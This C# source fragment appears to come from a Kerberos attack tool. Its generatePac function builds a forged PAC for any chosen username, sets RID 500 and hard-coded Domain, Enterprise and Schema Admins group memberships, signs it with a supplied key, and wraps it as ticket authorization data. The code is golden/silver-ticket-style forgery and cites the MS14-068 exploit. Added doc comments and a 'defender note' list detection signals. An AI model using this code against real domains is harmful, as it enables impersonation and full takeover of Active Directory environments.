private static void DecodeAsAdIfRelevant(byte[] bytes, TreeNode parentNode)
        {
            // The AD-IF-RELEVANT payload is itself an AuthorizationData sequence;
            // every inner element is attached to parentNode as an "AuthorizationData" node.
            foreach (var element in KrbAuthorizationDataSequence.Decode(bytes).AuthorizationData)
            {
                ExplodeObject(element, "AuthorizationData", parentNode);
            }
        }
        public KerbAuthDataTokenRestriction(KrbAuthorizationData authz)
            : base(authz.Type, AuthorizationDataType.KerbAuthDataTokenRestrictions)
        {
            // The restriction payload is an AuthorizationData sequence; only its
            // first element is consumed, any further elements are ignored.
            var inner = KrbAuthorizationDataSequence.Decode(authz.Data).AuthorizationData;

            foreach (var entry in inner)
            {
                RestrictionType = (int)entry.Type;
                Restriction     = new LsapTokenInfoIntegrity(entry.Data.ToArray());
                return;
            }
        }
        //KDC KRB_AP_ERR_MODIFIED: Message stream modified
        //During TGS processing, the KDC was unable to verify the signature on the PAC from krbtgt. This indicates the PAC was modified.

        //Kerberos PAC Validation
        //https://docs.microsoft.com/en-us/archive/blogs/openspecification/understanding-microsoft-kerberos-pac-validation
        /// <summary>
        /// Builds a PAC carrying a PAC_LOGON_INFO and a PAC_CLIENT_INFO buffer for
        /// <paramref name="username"/>, signs it with <paramref name="key"/>, and wraps it
        /// as an AD-WIN2K-PAC element inside an AD-IF-RELEVANT authorization-data element.
        /// </summary>
        /// <param name="username">Account name written to EffectiveName (UserName) and to the client-info Name.</param>
        /// <param name="domainsid">Domain SID as text; the literal "S-1-5-" is removed and the remaining
        /// '-'-separated fields are parsed as unsigned sub-authorities. Note the parameter is reassigned.</param>
        /// <param name="domainname">Logon domain name; upper-cased before being stored.</param>
        /// <param name="key">Passed as both arguments to PrivilegedAttributeCertificate.Encode
        /// (presumably the server and the KDC signature keys; confirm the parameter order against Encode).</param>
        /// <param name="now">Timestamp stored as LogonTime and as the client-info ClientId.</param>
        /// <param name="userid">RID stored in UserId; defaults to 500.</param>
        /// <returns>A single-element array holding the AD-IF-RELEVANT element.</returns>
        /// <remarks>
        /// Defender note: during TGS processing the KDC re-verifies the PAC's KDC checksum with the
        /// krbtgt key (see the KRB_AP_ERR_MODIFIED comment above); a PAC signed with any other key is
        /// rejected. The fixed values below (all-zero UserSessionKey, well-known high-privilege group
        /// RIDs granted to an arbitrary user, UserAccountControl with ADS_UF_LOCKOUT set) are the kind of
        /// inconsistencies PAC validation and ticket-auditing tooling can key on.
        /// </remarks>
        public static KrbAuthorizationData[] generatePac(string username, string domainsid, string domainname, KerberosKey key, DateTime now,
                                                         int userid = 500)
        {
            Console.WriteLine("[*] Building PAC ...");

            //////////////Build PAC

            var forgedPac = new PrivilegedAttributeCertificate();

            ////////////////
            //https://github.com/SecWiki/windows-kernel-exploits/blob/5593d65dcb94696242687904b55f4e27ce33f235/MS14-068/pykek/kek/pac.py#L56
            //PAC_LOGON_INFO
            var logonInfo = new PacLogonInfo();

            // LogonTime
            logonInfo.LogonTime = RpcFileTime.Convert(now);
            // LogoffTime
            ///logonInfo.LogoffTime = RpcFileTime.Convert(DateTime.MinValue);
            // KickOffTime
            //logonInfo.KickOffTime = RpcFileTime.Convert(DateTime.MinValue);
            // PasswordLastSet
            //logonInfo.PwdLastChangeTime = RpcFileTime.Convert(DateTime.Now.AddDays(-22));
            // PasswordCanChange
            //logonInfo.PwdCanChangeTime = RpcFileTime.Convert(DateTime.Now.AddDays(-21));
            // PasswordMustChange
            //logonInfo.PwdMustChangeTime = RpcFileTime.Convert(DateTime.MinValue);
            // EffectiveName
            logonInfo.UserName = username;
            // FullName
            //logonInfo.UserDisplayName = null;
            // LogonScript
            //logonInfo.LogonScript = "";
            // ProfilePath
            //logonInfo.ProfilePath = "";
            // HomeDirectory
            //logonInfo.HomeDirectory = "";
            // HomeDirectoryDrive
            //logonInfo.HomeDrive = "";
            // LogonCount
            //logonInfo.LogonCount = 0;
            // BadPasswordCount
            //logonInfo.BadPasswordCount = 0;
            // UserId
            // The caller-supplied RID is narrowed to uint here; a negative userid wraps rather than failing.
            logonInfo.UserId = (uint)userid;
            // PrimaryGroupId
            logonInfo.GroupId = 513;
            // GroupCount
            // GroupIds[0]
            // Every group below is emitted with the same attribute set: all SE_GROUP_* bits
            // except SE_GROUP_USE_FOR_DENY_ONLY (which is commented out).
            var se_group_all = SidAttributes.SE_GROUP_ENABLED |
                               SidAttributes.SE_GROUP_ENABLED_BY_DEFAULT |
                               SidAttributes.SE_GROUP_INTEGRITY |
                               SidAttributes.SE_GROUP_INTEGRITY_ENABLED |
                               SidAttributes.SE_GROUP_LOGON_ID |
                               SidAttributes.SE_GROUP_MANDATORY |
                               SidAttributes.SE_GROUP_OWNER |
                               SidAttributes.SE_GROUP_RESOURCE;
            //SidAttributes.SE_GROUP_USE_FOR_DENY_ONLY;
            // Hard-coded well-known domain RIDs; they are not derived from any directory lookup.
            IEnumerable <GroupMembership> groupIds = new GroupMembership[]
            {
                new GroupMembership()
                {
                    Attributes = se_group_all,
                    RelativeId = 513
                },
                new GroupMembership()
                {
                    Attributes = se_group_all,
                    RelativeId = 512
                },
                new GroupMembership()
                {
                    Attributes = se_group_all,
                    RelativeId = 520
                },
                new GroupMembership()
                {
                    Attributes = se_group_all,
                    RelativeId = 518
                },
                new GroupMembership()
                {
                    Attributes = se_group_all,
                    RelativeId = 519
                },
            };

            logonInfo.GroupIds = groupIds;
            // UserFlags
            logonInfo.UserFlags = UserFlags.LOGON_EXTRA_SIDS;
            // UserSessionKey
            // Fixed 16 zero bytes: the hex string is split on '-' and each pair parsed base-16.
            string userSessKeyStr = "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00";

            byte[] keyByte = Array.ConvertAll <string, byte>(userSessKeyStr.Split('-'), s => Convert.ToByte(s, 16));
            // keyByte is already a fresh array; the ToArray() copy is redundant but harmless.
            logonInfo.UserSessionKey = keyByte.ToArray().AsMemory();
            // LogonServer
            //logonInfo.ServerName = "";
            // LogonDomainName
            // Culture-sensitive ToUpper(); ToUpperInvariant() would be the safer choice for an identifier.
            logonInfo.DomainName = domainname.ToUpper();//domainname.Split('.')[0].ToUpper();


            // LogonDomainId
            // Replace removes every occurrence of "S-1-5-", not just a leading one, and the
            // parameter itself is overwritten.
            domainsid = domainsid.Replace("S-1-5-", string.Empty);
            var subCount = domainsid.Split('-').Length;

            uint[] subAuth = new uint[subCount];
            for (int i = 0; i < subCount; i++)
            {
                // Re-splits the string on every iteration; uint.Parse throws FormatException on a
                // non-numeric field and uses the current culture (no CultureInfo passed).
                subAuth[i] = uint.Parse(domainsid.Split('-')[i]);
            }

            // Six-byte identifier authority; only the last byte is set (presumably the NT authority
            // value, with the remaining bytes left zero).
            var identAuth = new byte[6];

            identAuth[5] = (int)IdentifierAuthority.NTAuthority;

            logonInfo.DomainId = new RpcSid()
            {
                IdentifierAuthority = new RpcSidIdentifierAuthority()
                {
                    IdentifierAuthority = identAuth
                },
                SubAuthority      = subAuth.AsMemory(),
                SubAuthorityCount = (byte)subCount,
                Revision          = 1
            };



            // Reserved1
            int[] reserved1 = { 0, 0 };
            logonInfo.Reserved1 = reserved1.ToArray().AsMemory();
            // UserAccountControl
            // NOTE(review): ADS_UF_LOCKOUT is set together with ADS_UF_NORMAL_ACCOUNT; the reason is
            // not visible here — confirm this is intended.
            logonInfo.UserAccountControl = UserAccountControlFlags.ADS_UF_NORMAL_ACCOUNT |
                                           UserAccountControlFlags.ADS_UF_LOCKOUT;
            // SubAuthStatus
            logonInfo.SubAuthStatus = 0;
            // LastSuccessFulILogon
            // 1601-01-01 is the FILETIME epoch; both interactive-logon timestamps are set to it.
            logonInfo.LastSuccessfulILogon = RpcFileTime.Convert(new DateTime(1601, 1, 1, 12, 00, 00));
            // LastFailedILogon
            logonInfo.LastFailedILogon = RpcFileTime.Convert(new DateTime(1601, 1, 1, 12, 00, 00));
            // FailedILogonCount
            logonInfo.FailedILogonCount = 0;
            // Reserved3
            logonInfo.Reserved3 = 0;
            // SidCount
            // ExtraSids
            // ResourceGroupDomainSid
            // ResourceGroupCount
            // ResourceGroupIdss
            //logonInfo.ResourceGroupIds = null;// new GroupMembership[] { };
            // ExtraIds
            //RpcSidAttributes[] extraIds =
            //{
            //    new RpcSidAttributes()
            //    {
            //        Sid = new RpcSid()
            //        {
            //            IdentifierAuthority = new RpcSidIdentifierAuthority(){},
            //            Revision = 1,
            //            //SubAuthority = a.ToArray().AsMemory()
            //        },
            //        Attributes = se_group_all
            //    }
            //};
            //logonInfo.ExtraIds = extraIds;
            //logonInfo.ResourceGroupIds = new GroupMembership[] { };

            forgedPac.LogonInfo = logonInfo;



            ////////////////
            //PAC_CLIENT_INFO
            // Same timestamp as LogonTime; ClientId is the only time field in this buffer.
            var clientInformation = new PacClientInfo()
            {
                Name     = username,
                ClientId = RpcFileTime.Convert(now),
            };


            forgedPac.ClientInformation = clientInformation;

            //From Book: Network Security Assessment Table 7-26
            //TGT: PAC (KDC)    -> krbtgt
            //     PAC (Server) -> krbtgt
            var authz = new List <KrbAuthorizationData>();


            // Inner element: the encoded PAC as AD-WIN2K-PAC. Encode receives the same key twice
            // (presumably server checksum key, KDC checksum key — confirm against its signature).
            var sequence = new KrbAuthorizationDataSequence
            {
                AuthorizationData = new[]
                {
                    new KrbAuthorizationData
                    {
                        Type = AuthorizationDataType.AdWin2kPac,
                        Data = forgedPac.Encode(key, key)
                    }
                }
            };

            // Outer element: the sequence above wrapped as AD-IF-RELEVANT.
            authz.Add(
                new KrbAuthorizationData
            {
                Type = AuthorizationDataType.AdIfRelevant,
                Data = sequence.Encode()
            });


            return(authz.ToArray());
        }